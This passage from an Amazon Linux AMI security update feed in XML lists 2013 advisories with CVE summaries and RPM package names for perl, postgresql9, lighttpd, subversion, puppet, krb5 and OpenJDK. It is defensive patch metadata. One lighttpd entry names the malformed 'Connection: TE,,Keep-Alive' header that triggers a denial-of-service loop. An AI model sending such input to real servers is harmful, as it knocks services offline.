version="0.77" release="130.17.amzn1" epoch="3" 
arch="i686"><filename>Packages/perl-version-0.77-130.17.amzn1.i686.rpm</filename></package><package name="perl-IO-Compress-Base" version="2.020" release="130.17.amzn1" epoch="0" arch="i686"><filename>Packages/perl-IO-Compress-Base-2.020-130.17.amzn1.i686.rpm</filename></package><package name="perl-Archive-Tar" version="1.58" release="130.17.amzn1" epoch="0" arch="i686"><filename>Packages/perl-Archive-Tar-1.58-130.17.amzn1.i686.rpm</filename></package><package name="perl-Test-Harness" version="3.17" release="130.17.amzn1" epoch="0" arch="i686"><filename>Packages/perl-Test-Harness-3.17-130.17.amzn1.i686.rpm</filename></package><package name="perl-Module-Load" version="0.16" release="130.17.amzn1" epoch="1" arch="i686"><filename>Packages/perl-Module-Load-0.16-130.17.amzn1.i686.rpm</filename></package><package name="perl-Compress-Raw-Bzip2" version="2.020" release="130.17.amzn1" epoch="0" arch="i686"><filename>Packages/perl-Compress-Raw-Bzip2-2.020-130.17.amzn1.i686.rpm</filename></package><package name="perl-Archive-Extract" version="0.38" release="130.17.amzn1" epoch="1" arch="i686"><filename>Packages/perl-Archive-Extract-0.38-130.17.amzn1.i686.rpm</filename></package><package name="perl-IO-Compress-Bzip2" version="2.020" release="130.17.amzn1" epoch="0" arch="i686"><filename>Packages/perl-IO-Compress-Bzip2-2.020-130.17.amzn1.i686.rpm</filename></package><package name="perl-IPC-Cmd" version="0.56" release="130.17.amzn1" epoch="1" arch="i686"><filename>Packages/perl-IPC-Cmd-0.56-130.17.amzn1.i686.rpm</filename></package><package name="perl-CGI" version="3.51" release="130.17.amzn1" epoch="0" arch="i686"><filename>Packages/perl-CGI-3.51-130.17.amzn1.i686.rpm</filename></package><package name="perl-Term-UI" version="0.20" release="130.17.amzn1" epoch="0" arch="i686"><filename>Packages/perl-Term-UI-0.20-130.17.amzn1.i686.rpm</filename></package><package name="perl" version="5.10.1" release="130.17.amzn1" epoch="4" 
arch="i686"><filename>Packages/perl-5.10.1-130.17.amzn1.i686.rpm</filename></package><package name="perl-ExtUtils-CBuilder" version="0.27" release="130.17.amzn1" epoch="1" arch="i686"><filename>Packages/perl-ExtUtils-CBuilder-0.27-130.17.amzn1.i686.rpm</filename></package><package name="perl-Package-Constants" version="0.02" release="130.17.amzn1" epoch="1" arch="i686"><filename>Packages/perl-Package-Constants-0.02-130.17.amzn1.i686.rpm</filename></package><package name="perl-Module-Loaded" version="0.02" release="130.17.amzn1" epoch="1" arch="i686"><filename>Packages/perl-Module-Loaded-0.02-130.17.amzn1.i686.rpm</filename></package><package name="perl-core" version="5.10.1" release="130.17.amzn1" epoch="0" arch="i686"><filename>Packages/perl-core-5.10.1-130.17.amzn1.i686.rpm</filename></package><package name="perl-Object-Accessor" version="0.34" release="130.17.amzn1" epoch="1" arch="i686"><filename>Packages/perl-Object-Accessor-0.34-130.17.amzn1.i686.rpm</filename></package><package name="perl-Compress-Raw-Zlib" version="2.023" release="130.17.amzn1" epoch="0" arch="i686"><filename>Packages/perl-Compress-Raw-Zlib-2.023-130.17.amzn1.i686.rpm</filename></package><package name="perl-devel" version="5.10.1" release="130.17.amzn1" epoch="4" arch="i686"><filename>Packages/perl-devel-5.10.1-130.17.amzn1.i686.rpm</filename></package><package name="perl-Module-CoreList" version="2.18" release="130.17.amzn1" epoch="0" arch="i686"><filename>Packages/perl-Module-CoreList-2.18-130.17.amzn1.i686.rpm</filename></package><package name="perl-Test-Simple" version="0.92" release="130.17.amzn1" epoch="0" arch="i686"><filename>Packages/perl-Test-Simple-0.92-130.17.amzn1.i686.rpm</filename></package><package name="perl-debuginfo" version="5.10.1" release="130.17.amzn1" epoch="4" arch="i686"><filename>Packages/perl-debuginfo-5.10.1-130.17.amzn1.i686.rpm</filename></package><package name="perl-Locale-Maketext-Simple" version="0.18" release="130.17.amzn1" epoch="1" 
arch="i686"><filename>Packages/perl-Locale-Maketext-Simple-0.18-130.17.amzn1.i686.rpm</filename></package><package name="perl-CPANPLUS" version="0.88" release="130.17.amzn1" epoch="0" arch="i686"><filename>Packages/perl-CPANPLUS-0.88-130.17.amzn1.i686.rpm</filename></package><package name="perl-Parse-CPAN-Meta" version="1.40" release="130.17.amzn1" epoch="1" arch="i686"><filename>Packages/perl-Parse-CPAN-Meta-1.40-130.17.amzn1.i686.rpm</filename></package><package name="perl-IO-Zlib" version="1.09" release="130.17.amzn1" epoch="1" arch="i686"><filename>Packages/perl-IO-Zlib-1.09-130.17.amzn1.i686.rpm</filename></package><package name="perl-ExtUtils-Embed" version="1.28" release="130.17.amzn1" epoch="0" arch="i686"><filename>Packages/perl-ExtUtils-Embed-1.28-130.17.amzn1.i686.rpm</filename></package><package name="perl-Digest-SHA" version="5.47" release="130.17.amzn1" epoch="1" arch="i686"><filename>Packages/perl-Digest-SHA-5.47-130.17.amzn1.i686.rpm</filename></package><package name="perl-Compress-Zlib" version="2.020" release="130.17.amzn1" epoch="0" arch="i686"><filename>Packages/perl-Compress-Zlib-2.020-130.17.amzn1.i686.rpm</filename></package><package name="perl-Params-Check" version="0.26" release="130.17.amzn1" epoch="1" arch="i686"><filename>Packages/perl-Params-Check-0.26-130.17.amzn1.i686.rpm</filename></package><package name="perl-Time-HiRes" version="1.9721" release="130.17.amzn1" epoch="4" arch="i686"><filename>Packages/perl-Time-HiRes-1.9721-130.17.amzn1.i686.rpm</filename></package><package name="perl-Module-Build" version="0.3500" release="130.17.amzn1" epoch="1" arch="i686"><filename>Packages/perl-Module-Build-0.3500-130.17.amzn1.i686.rpm</filename></package><package name="perl-Time-Piece" version="1.15" release="130.17.amzn1" epoch="0" arch="i686"><filename>Packages/perl-Time-Piece-1.15-130.17.amzn1.i686.rpm</filename></package><package name="perl-Log-Message" version="0.02" release="130.17.amzn1" epoch="1" 
arch="i686"><filename>Packages/perl-Log-Message-0.02-130.17.amzn1.i686.rpm</filename></package><package name="perl-Module-Pluggable" version="3.90" release="130.17.amzn1" epoch="1" arch="i686"><filename>Packages/perl-Module-Pluggable-3.90-130.17.amzn1.i686.rpm</filename></package><package name="perl-CPAN" version="1.9402" release="130.17.amzn1" epoch="0" arch="i686"><filename>Packages/perl-CPAN-1.9402-130.17.amzn1.i686.rpm</filename></package><package name="perl-ExtUtils-ParseXS" version="2.2003.0" release="130.17.amzn1" epoch="1" arch="i686"><filename>Packages/perl-ExtUtils-ParseXS-2.2003.0-130.17.amzn1.i686.rpm</filename></package><package name="perl-Log-Message-Simple" version="0.04" release="130.17.amzn1" epoch="0" arch="i686"><filename>Packages/perl-Log-Message-Simple-0.04-130.17.amzn1.i686.rpm</filename></package><package name="perl-Pod-Simple" version="3.13" release="130.17.amzn1" epoch="1" arch="i686"><filename>Packages/perl-Pod-Simple-3.13-130.17.amzn1.i686.rpm</filename></package><package name="perl-ExtUtils-MakeMaker" version="6.55" release="130.17.amzn1" epoch="0" arch="i686"><filename>Packages/perl-ExtUtils-MakeMaker-6.55-130.17.amzn1.i686.rpm</filename></package><package name="perl-Module-Load-Conditional" version="0.30" release="130.17.amzn1" epoch="0" arch="i686"><filename>Packages/perl-Module-Load-Conditional-0.30-130.17.amzn1.i686.rpm</filename></package><package name="perl-IO-Compress-Zlib" version="2.020" release="130.17.amzn1" epoch="0" arch="i686"><filename>Packages/perl-IO-Compress-Zlib-2.020-130.17.amzn1.i686.rpm</filename></package><package name="perl-parent" version="0.221" release="130.17.amzn1" epoch="1" arch="i686"><filename>Packages/perl-parent-0.221-130.17.amzn1.i686.rpm</filename></package><package name="perl-File-Fetch" version="0.26" release="130.17.amzn1" epoch="0" arch="i686"><filename>Packages/perl-File-Fetch-0.26-130.17.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" 
author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-178</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-178: critical priority package update for postgresql9</title><issued date="2013-04-04 11:49:00" /><updated date="2014-09-15 22:49:00" /><severity>critical</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-1901:
929328:
CVE-2013-1901 postgresql: Improper user privilege check for on-line backups
CVE-2013-1900:
929255:
CVE-2013-1900 postgresql: Improper randomization of pgcrypto functions (requiring random seed)
CVE-2013-1899:
929223:
CVE-2013-1899 postgresql: Insecure switch parsing
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1899" title="" id="CVE-2013-1899" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1900" title="" id="CVE-2013-1900" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1901" title="" id="CVE-2013-1901" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="postgresql9-test" version="9.2.4" release="1.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql9-test-9.2.4-1.35.amzn1.x86_64.rpm</filename></package><package name="postgresql9-server" version="9.2.4" release="1.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql9-server-9.2.4-1.35.amzn1.x86_64.rpm</filename></package><package name="postgresql9-docs" version="9.2.4" release="1.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql9-docs-9.2.4-1.35.amzn1.x86_64.rpm</filename></package><package name="postgresql9-debuginfo" version="9.2.4" release="1.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql9-debuginfo-9.2.4-1.35.amzn1.x86_64.rpm</filename></package><package name="postgresql9-pltcl" version="9.2.4" release="1.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql9-pltcl-9.2.4-1.35.amzn1.x86_64.rpm</filename></package><package name="postgresql9-upgrade" version="9.2.4" release="1.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql9-upgrade-9.2.4-1.35.amzn1.x86_64.rpm</filename></package><package name="postgresql9-devel" version="9.2.4" release="1.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql9-devel-9.2.4-1.35.amzn1.x86_64.rpm</filename></package><package name="postgresql9-libs" version="9.2.4" release="1.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql9-libs-9.2.4-1.35.amzn1.x86_64.rpm</filename></package><package name="postgresql9-plperl" version="9.2.4" release="1.35.amzn1" 
epoch="0" arch="x86_64"><filename>Packages/postgresql9-plperl-9.2.4-1.35.amzn1.x86_64.rpm</filename></package><package name="postgresql9" version="9.2.4" release="1.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql9-9.2.4-1.35.amzn1.x86_64.rpm</filename></package><package name="postgresql9-plpython" version="9.2.4" release="1.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql9-plpython-9.2.4-1.35.amzn1.x86_64.rpm</filename></package><package name="postgresql9-contrib" version="9.2.4" release="1.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql9-contrib-9.2.4-1.35.amzn1.x86_64.rpm</filename></package><package name="postgresql9-libs" version="9.2.4" release="1.35.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql9-libs-9.2.4-1.35.amzn1.i686.rpm</filename></package><package name="postgresql9-plperl" version="9.2.4" release="1.35.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql9-plperl-9.2.4-1.35.amzn1.i686.rpm</filename></package><package name="postgresql9-docs" version="9.2.4" release="1.35.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql9-docs-9.2.4-1.35.amzn1.i686.rpm</filename></package><package name="postgresql9-contrib" version="9.2.4" release="1.35.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql9-contrib-9.2.4-1.35.amzn1.i686.rpm</filename></package><package name="postgresql9-pltcl" version="9.2.4" release="1.35.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql9-pltcl-9.2.4-1.35.amzn1.i686.rpm</filename></package><package name="postgresql9-test" version="9.2.4" release="1.35.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql9-test-9.2.4-1.35.amzn1.i686.rpm</filename></package><package name="postgresql9-devel" version="9.2.4" release="1.35.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql9-devel-9.2.4-1.35.amzn1.i686.rpm</filename></package><package name="postgresql9" version="9.2.4" release="1.35.amzn1" epoch="0" 
arch="i686"><filename>Packages/postgresql9-9.2.4-1.35.amzn1.i686.rpm</filename></package><package name="postgresql9-plpython" version="9.2.4" release="1.35.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql9-plpython-9.2.4-1.35.amzn1.i686.rpm</filename></package><package name="postgresql9-upgrade" version="9.2.4" release="1.35.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql9-upgrade-9.2.4-1.35.amzn1.i686.rpm</filename></package><package name="postgresql9-debuginfo" version="9.2.4" release="1.35.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql9-debuginfo-9.2.4-1.35.amzn1.i686.rpm</filename></package><package name="postgresql9-server" version="9.2.4" release="1.35.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql9-server-9.2.4-1.35.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-179</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-179: medium priority package update for lighttpd</title><issued date="2013-04-11 17:24:00" /><updated date="2014-09-15 22:49:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2012-5533:
The http_request_split_value function in request.c in lighttpd before 1.4.32 allows remote attackers to cause a denial of service (infinite loop) via a request with a header containing an empty token, as demonstrated using the "Connection: TE,,Keep-Alive" header.
878213:
CVE-2012-5533 lighttpd: Denial of Service via malformed Connection headers
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5533" title="" id="CVE-2012-5533" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="lighttpd-debuginfo" version="1.4.31" release="1.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/lighttpd-debuginfo-1.4.31-1.5.amzn1.x86_64.rpm</filename></package><package name="lighttpd-mod_mysql_vhost" version="1.4.31" release="1.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/lighttpd-mod_mysql_vhost-1.4.31-1.5.amzn1.x86_64.rpm</filename></package><package name="lighttpd-mod_geoip" version="1.4.31" release="1.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/lighttpd-mod_geoip-1.4.31-1.5.amzn1.x86_64.rpm</filename></package><package name="lighttpd-fastcgi" version="1.4.31" release="1.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/lighttpd-fastcgi-1.4.31-1.5.amzn1.x86_64.rpm</filename></package><package name="lighttpd" version="1.4.31" release="1.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/lighttpd-1.4.31-1.5.amzn1.x86_64.rpm</filename></package><package name="lighttpd-mod_geoip" version="1.4.31" release="1.5.amzn1" epoch="0" arch="i686"><filename>Packages/lighttpd-mod_geoip-1.4.31-1.5.amzn1.i686.rpm</filename></package><package name="lighttpd-debuginfo" version="1.4.31" release="1.5.amzn1" epoch="0" arch="i686"><filename>Packages/lighttpd-debuginfo-1.4.31-1.5.amzn1.i686.rpm</filename></package><package name="lighttpd" version="1.4.31" release="1.5.amzn1" epoch="0" arch="i686"><filename>Packages/lighttpd-1.4.31-1.5.amzn1.i686.rpm</filename></package><package name="lighttpd-mod_mysql_vhost" version="1.4.31" release="1.5.amzn1" epoch="0" arch="i686"><filename>Packages/lighttpd-mod_mysql_vhost-1.4.31-1.5.amzn1.i686.rpm</filename></package><package name="lighttpd-fastcgi" version="1.4.31" release="1.5.amzn1" epoch="0" 
arch="i686"><filename>Packages/lighttpd-fastcgi-1.4.31-1.5.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-180</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-180: medium priority package update for subversion</title><issued date="2013-04-11 17:27:00" /><updated date="2014-09-15 22:50:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-1849:
A NULL pointer dereference flaw was found in the way the mod_dav_svn module handled PROPFIND requests on activity URLs. A remote attacker could use this flaw to cause the httpd process serving the request to crash.
CVE-2013-1847:
Two NULL pointer dereference flaws were found in the way the mod_dav_svn module handled LOCK requests on certain types of URLs. A malicious, remote user could use these flaws to cause the httpd process serving the request to crash.
CVE-2013-1846:
Two NULL pointer dereference flaws were found in the way the mod_dav_svn module handled LOCK requests on certain types of URLs. A malicious, remote user could use these flaws to cause the httpd process serving the request to crash.
CVE-2013-1845:
A flaw was found in the way the mod_dav_svn module handled large numbers of properties (such as those set with the "svn propset" command). A malicious, remote user could use this flaw to cause the httpd process serving the request to consume an excessive amount of system memory.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1845" title="" id="CVE-2013-1845" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1846" title="" id="CVE-2013-1846" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1847" title="" id="CVE-2013-1847" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1849" title="" id="CVE-2013-1849" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2013:0737.html" title="" id="RHSA-2013:0737" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="subversion-debuginfo" version="1.7.9" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-debuginfo-1.7.9-1.28.amzn1.x86_64.rpm</filename></package><package name="subversion-javahl" version="1.7.9" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-javahl-1.7.9-1.28.amzn1.x86_64.rpm</filename></package><package name="subversion-tools" version="1.7.9" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-tools-1.7.9-1.28.amzn1.x86_64.rpm</filename></package><package name="subversion-perl" version="1.7.9" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-perl-1.7.9-1.28.amzn1.x86_64.rpm</filename></package><package name="subversion" version="1.7.9" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-1.7.9-1.28.amzn1.x86_64.rpm</filename></package><package name="mod_dav_svn" version="1.7.9" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod_dav_svn-1.7.9-1.28.amzn1.x86_64.rpm</filename></package><package name="subversion-devel" version="1.7.9" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-devel-1.7.9-1.28.amzn1.x86_64.rpm</filename></package><package name="subversion-python" version="1.7.9" 
release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-python-1.7.9-1.28.amzn1.x86_64.rpm</filename></package><package name="subversion-ruby" version="1.7.9" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-ruby-1.7.9-1.28.amzn1.x86_64.rpm</filename></package><package name="subversion-libs" version="1.7.9" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-libs-1.7.9-1.28.amzn1.x86_64.rpm</filename></package><package name="subversion-devel" version="1.7.9" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-devel-1.7.9-1.28.amzn1.i686.rpm</filename></package><package name="subversion-javahl" version="1.7.9" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-javahl-1.7.9-1.28.amzn1.i686.rpm</filename></package><package name="subversion-perl" version="1.7.9" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-perl-1.7.9-1.28.amzn1.i686.rpm</filename></package><package name="subversion-ruby" version="1.7.9" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-ruby-1.7.9-1.28.amzn1.i686.rpm</filename></package><package name="mod_dav_svn" version="1.7.9" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/mod_dav_svn-1.7.9-1.28.amzn1.i686.rpm</filename></package><package name="subversion-libs" version="1.7.9" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-libs-1.7.9-1.28.amzn1.i686.rpm</filename></package><package name="subversion-debuginfo" version="1.7.9" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-debuginfo-1.7.9-1.28.amzn1.i686.rpm</filename></package><package name="subversion-tools" version="1.7.9" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-tools-1.7.9-1.28.amzn1.i686.rpm</filename></package><package name="subversion-python" version="1.7.9" release="1.28.amzn1" epoch="0" 
arch="i686"><filename>Packages/subversion-python-1.7.9-1.28.amzn1.i686.rpm</filename></package><package name="subversion" version="1.7.9" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-1.7.9-1.28.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-181</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-181: medium priority package update for puppet</title><issued date="2013-04-11 17:32:00" /><updated date="2014-09-15 22:50:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-1640:
The (1) template and (2) inline_template functions in the master server in Puppet before 2.6.18, 2.7.x before 2.7.21, and 3.1.x before 3.1.1, and Puppet Enterprise before 1.2.7 and 2.7.x before 2.7.2 allow remote authenticated users to execute arbitrary code via a crafted catalog request.
919783:
CVE-2013-1640 Puppet: catalog request code execution
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1640" title="" id="CVE-2013-1640" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="puppet-debuginfo" version="2.7.21" release="2.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/puppet-debuginfo-2.7.21-2.11.amzn1.x86_64.rpm</filename></package><package name="puppet" version="2.7.21" release="2.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/puppet-2.7.21-2.11.amzn1.x86_64.rpm</filename></package><package name="puppet-server" version="2.7.21" release="2.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/puppet-server-2.7.21-2.11.amzn1.x86_64.rpm</filename></package><package name="puppet-debuginfo" version="2.7.21" release="2.11.amzn1" epoch="0" arch="i686"><filename>Packages/puppet-debuginfo-2.7.21-2.11.amzn1.i686.rpm</filename></package><package name="puppet-server" version="2.7.21" release="2.11.amzn1" epoch="0" arch="i686"><filename>Packages/puppet-server-2.7.21-2.11.amzn1.i686.rpm</filename></package><package name="puppet" version="2.7.21" release="2.11.amzn1" epoch="0" arch="i686"><filename>Packages/puppet-2.7.21-2.11.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-182</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-182: medium priority package update for krb5</title><issued date="2013-04-18 13:58:00" /><updated date="2014-09-15 22:51:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-1416:
A NULL pointer dereference flaw was found in the way the MIT Kerberos KDC processed certain TGS (Ticket-granting Server) requests. A remote, authenticated attacker could use this flaw to crash the KDC via a specially-crafted TGS request.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1416" title="" id="CVE-2013-1416" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2013:0748.html" title="" id="RHSA-2013:0748" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="krb5-workstation" version="1.10.3" release="10.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/krb5-workstation-1.10.3-10.25.amzn1.x86_64.rpm</filename></package><package name="krb5-server" version="1.10.3" release="10.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/krb5-server-1.10.3-10.25.amzn1.x86_64.rpm</filename></package><package name="krb5-devel" version="1.10.3" release="10.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/krb5-devel-1.10.3-10.25.amzn1.x86_64.rpm</filename></package><package name="krb5-pkinit-openssl" version="1.10.3" release="10.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/krb5-pkinit-openssl-1.10.3-10.25.amzn1.x86_64.rpm</filename></package><package name="krb5-libs" version="1.10.3" release="10.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/krb5-libs-1.10.3-10.25.amzn1.x86_64.rpm</filename></package><package name="krb5-debuginfo" version="1.10.3" release="10.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/krb5-debuginfo-1.10.3-10.25.amzn1.x86_64.rpm</filename></package><package name="krb5-server-ldap" version="1.10.3" release="10.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/krb5-server-ldap-1.10.3-10.25.amzn1.x86_64.rpm</filename></package><package name="krb5-devel" version="1.10.3" release="10.25.amzn1" epoch="0" arch="i686"><filename>Packages/krb5-devel-1.10.3-10.25.amzn1.i686.rpm</filename></package><package name="krb5-workstation" version="1.10.3" release="10.25.amzn1" epoch="0" arch="i686"><filename>Packages/krb5-workstation-1.10.3-10.25.amzn1.i686.rpm</filename></package><package name="krb5-server" version="1.10.3" release="10.25.amzn1" 
epoch="0" arch="i686"><filename>Packages/krb5-server-1.10.3-10.25.amzn1.i686.rpm</filename></package><package name="krb5-server-ldap" version="1.10.3" release="10.25.amzn1" epoch="0" arch="i686"><filename>Packages/krb5-server-ldap-1.10.3-10.25.amzn1.i686.rpm</filename></package><package name="krb5-debuginfo" version="1.10.3" release="10.25.amzn1" epoch="0" arch="i686"><filename>Packages/krb5-debuginfo-1.10.3-10.25.amzn1.i686.rpm</filename></package><package name="krb5-pkinit-openssl" version="1.10.3" release="10.25.amzn1" epoch="0" arch="i686"><filename>Packages/krb5-pkinit-openssl-1.10.3-10.25.amzn1.i686.rpm</filename></package><package name="krb5-libs" version="1.10.3" release="10.25.amzn1" epoch="0" arch="i686"><filename>Packages/krb5-libs-1.10.3-10.25.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-183</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-183: critical priority package update for java-1.7.0-openjdk</title><issued date="2013-04-18 13:59:00" /><updated date="2014-09-15 22:52:00" /><severity>critical</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-2436:
Multiple improper permission check issues were discovered in the Beans, Libraries, JAXP, and RMI components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass Java sandbox restrictions.
CVE-2013-2431:
It was discovered that the Hotspot component did not properly handle certain intrinsic frames, and did not correctly perform access checks and MethodHandle lookups. An untrusted Java application or applet could use these flaws to bypass Java sandbox restrictions.
CVE-2013-2430:
It was discovered that JPEGImageReader and JPEGImageWriter in the ImageIO component did not protect against modification of their state while performing certain native code operations. An untrusted Java application or applet could possibly use these flaws to trigger Java Virtual Machine memory corruption.
CVE-2013-2429:
It was discovered that JPEGImageReader and JPEGImageWriter in the ImageIO component did not protect against modification of their state while performing certain native code operations. An untrusted Java application or applet could possibly use these flaws to trigger Java Virtual Machine memory corruption.
CVE-2013-2426:
The JDBC driver manager could incorrectly call the toString() method in JDBC drivers, and the ConcurrentHashMap class could incorrectly call the defaultReadObject() method. An untrusted Java application or applet could possibly use these flaws to bypass Java sandbox restrictions.
CVE-2013-2424:
The MBeanInstantiator class implementation in the OpenJDK JMX component did not properly check class access before creating new instances. An untrusted Java application or applet could use this flaw to create instances of non-public classes.
CVE-2013-2423:
It was discovered that the Hotspot component did not properly handle certain intrinsic frames, and did not correctly perform access checks and MethodHandle lookups. An untrusted Java application or applet could use these flaws to bypass Java sandbox restrictions.
CVE-2013-2422:
Multiple improper permission check issues were discovered in the Beans, Libraries, JAXP, and RMI components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass Java sandbox restrictions.
CVE-2013-2421:
It was discovered that the Hotspot component did not properly handle certain intrinsic frames, and did not correctly perform access checks and MethodHandle lookups. An untrusted Java application or applet could use these flaws to bypass Java sandbox restrictions.
CVE-2013-2420:
The 2D component did not properly process certain images. An untrusted Java application or applet could possibly use this flaw to trigger Java Virtual Machine memory corruption.
CVE-2013-2419:
Flaws were discovered in the Network component's InetAddress serialization, and the 2D component's font handling. An untrusted Java application or applet could possibly use these flaws to crash the Java Virtual Machine.
CVE-2013-2417:
Flaws were discovered in the Network component's InetAddress serialization, and the 2D component's font handling. An untrusted Java application or applet could possibly use these flaws to crash the Java Virtual Machine.
CVE-2013-2415:
It was discovered that JAX-WS could possibly create temporary files with insecure permissions. A local attacker could use this flaw to access temporary files created by an application using JAX-WS.
CVE-2013-2384:
Multiple flaws were discovered in the font layout engine in the 2D component. An untrusted Java application or applet could possibly use these flaws to trigger Java Virtual Machine memory corruption.
CVE-2013-2383:
Multiple flaws were discovered in the font layout engine in the 2D component. An untrusted Java application or applet could possibly use these flaws to trigger Java Virtual Machine memory corruption.
CVE-2013-1569:
Multiple flaws were discovered in the font layout engine in the 2D component. An untrusted Java application or applet could possibly use these flaws to trigger Java Virtual Machine memory corruption.
CVE-2013-1558:
Multiple improper permission check issues were discovered in the Beans, Libraries, JAXP, and RMI components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass Java sandbox restrictions.
CVE-2013-1557:
Multiple improper permission check issues were discovered in the Beans, Libraries, JAXP, and RMI components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass Java sandbox restrictions.
